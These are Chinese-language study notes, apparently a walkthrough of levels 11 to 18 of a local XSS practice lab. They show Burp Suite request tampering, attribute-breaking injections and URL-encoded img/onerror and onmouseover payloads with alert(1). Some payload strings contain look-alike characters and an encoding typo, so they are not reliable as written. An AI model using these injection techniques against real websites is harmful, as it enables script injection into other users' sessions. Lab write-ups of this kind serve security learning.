本文为学习笔记,仅限学习交流 不得利用、从事危害国家或人民安全、荣誉和利益等活动 level11 查看源代码
尝试 利用BP抓包,改包 构造语句,注意闭合 level12 尝试BP抓包 改包: “ type=“test” οnclick=“alert(1) 放包。查看页面,操作成功。 level13 参照12题,尝试BP抓包,改包 改包:” type=“test” οnclick="alert(1) level16
查看源代码 尝试构造语句: 尝试Url编码 在线编码转换:http://tool.oschina.net/encode?type=4 空格= %0a < = %3c > = %3E
http://127.0.0.1/xss/level16.php?keyword=test%20%3Cimg%0asrc=1%oaοnerrοr=alert%20(1)%0aοnclick=alert(1)%3E level 17 查看源代码 http://127.0.0.1/xss/level17.php?arg01=a&arg02=b οnmοuseοver=alert(1) level 18 http://127.0.0.1/xss/level18.php?arg01=a&arg02=b οnmοuseοver=alert(1)